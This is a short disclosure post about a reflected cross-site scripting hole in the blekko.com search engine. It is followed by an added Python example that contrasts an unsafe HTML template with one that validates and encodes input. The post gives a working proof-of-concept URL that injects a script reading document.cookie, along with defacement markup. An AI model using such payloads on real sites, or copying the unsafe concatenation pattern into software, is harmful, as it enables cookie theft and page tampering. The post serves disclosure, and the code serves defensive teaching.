blekko.com (spam-free search engine) vulnerable to XSS (cross-site scripting)

A hacker, Sony, reported a new XSS vulnerability in blekko.com, a web search engine. Blekko aims to provide better search results than Google Search by drawing results from a set of 3 billion trusted websites and excluding material from sites such as content farms. The site, launched to the public on November 1, 2010, uses slashtags to provide results for common searches.


PoC:
http://blekko.com/tag/profile?m=1&email=editpro%2540bk.ru&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cimg%20src=%20http://www.tnr.com/sites/default/files/imagecache/thumbnail_landing/RomaniaFlag.jpg%20align=center%3E%3Cmarquee%20scrollamount=%223%22%3ESystem%20Error..well,%20joke,%20it%27s%20only%20xss..We%20can%20see%20Cross%20Site%20Scripting%20on%20the%20Blekko%20-%20web%20search%20engine.%20By%20Sony.%20http://st2tea.blogspot.com%3C/marquee%3E
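
In the PoC the script markup travels in the website parameter of the profile URL. The following is an added example, not Blekko's code and not part of the original post: it contrasts a hypothetical template that concatenates that value into HTML with one that validates the URL and HTML-encodes it. All function names and the shortened sample query string are assumptions made for illustration.

```python
from html import escape
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed query string modelled on the PoC's parameters (shortened).
SAMPLE_QUERY = (
    "m=1&name=&desc=&website=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E"
)
ALLOWED_SCHEMES = {"http", "https"}


def website_from_query(query: str) -> str:
    """Return the URL-decoded 'website' field, as a web framework would."""
    return parse_qs(query, keep_blank_values=True).get("website", [""])[0]


def render_unsafe(website: str) -> str:
    """Hypothetical vulnerable template: raw value concatenated into HTML."""
    return '<div class="profile">Website: ' + website + "</div>"


def clean_website(value: str) -> Optional[str]:
    """Accept only absolute http(s) URLs with no markup, quotes or whitespace."""
    value = value.strip()
    if not value or any(c in "<>\"'`" or c.isspace() for c in value):
        return None
    try:
        parts = urlsplit(value)
    except ValueError:  # malformed authority, e.g. unbalanced IPv6 brackets
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return value


def render_safe(website: str) -> str:
    """Validate first, then HTML-encode for both attribute and text context."""
    url = clean_website(website)
    if url is None:
        return '<div class="profile">Website: (not set)</div>'
    safe = escape(url, quote=True)
    return ('<div class="profile">Website: '
            f'<a href="{safe}" rel="nofollow noopener">{safe}</a></div>')


if __name__ == "__main__":
    field = website_from_query(SAMPLE_QUERY)
    print(render_unsafe(field))  # markup reaches the page unchanged
    print(render_safe(field))    # value rejected, placeholder rendered
```

Validation alone is not the control here: the encoding step in render_safe is what keeps an accepted URL containing & or similar characters from altering the surrounding markup.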


source:
st2tea.blogspot.com